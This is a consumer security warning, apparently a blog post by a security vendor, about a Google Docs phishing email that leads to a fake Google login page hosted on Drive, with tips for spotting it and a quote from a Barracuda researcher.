Warning: A Google Docs email phishing scam is making the rounds.
Recipients are being sent an email with the word “Documents” as the subject – and when opened, users are prompted to view an “important” Google Drive document. If you click on the link, be prepared to land on a webpage that looks almost identical to the Google Drive login page where you’ll be asked to enter your username and password.
With the Google logo, slogan, and icons, the fraud login page looks strikingly similar to the real deal. Can you tell if the Google login page below is real or an impostor?
The photo is of a fraudulent Google login page. Since the phishing site doesn’t recognize actual Google user info, we’ve found that one easy way to spot a fraud link is by checking for your account photo (depending on if you have cookies enabled). The fraudulent Google Drive site won’t have access to your account settings, so the login page will look generic – sans photo or email address.
But it gets even trickier: The fake page is actually hosted on Google’s servers. This will show in the address bar after the phishing link is clicked on, making the page seem more convincing. The scammers do this by uploading a document into their public folder in Google Drive and using the preview feature for a publicly accessible link. These types of email phishing scams are becoming increasingly advanced (ie recent Netflix scam and Target data breach) – and more difficult to spot.
When users log in to the fake Google Drive site, their username and password are sent to a compromised web server before redirecting you to an actual Google doc. Though you may not notice anything suspicious, this simple login could have hefty consequences on your bank account. Scammers will have access to make purchases on Google Play for apps and content, obtain access to your Google+ account and Google Docs along with your Gmail account.
Luis Chapetti, Barracuda Engineer and Researcher, weighed in on the phishing attack:
“While this is not a new threat in the email security landscape, it is important to take note that spammers always revert back to doing what works. This Google Doc technique works. Users should be vigilant and always remember not to click on any embedded link in emails. Instead, open up a new browser and type in the link directly.”
Google has also released an update stating they have removed the phishing pages and are working diligently to prevent this spoof from happening again. The Google team suggests resetting your password if you have any suspicion of a personal data breach.
To avoid becoming a victim of an email phishing attack, refrain from clicking on links or attachments in messages from unrecognized senders and never enter your password in a location that seems sketchy.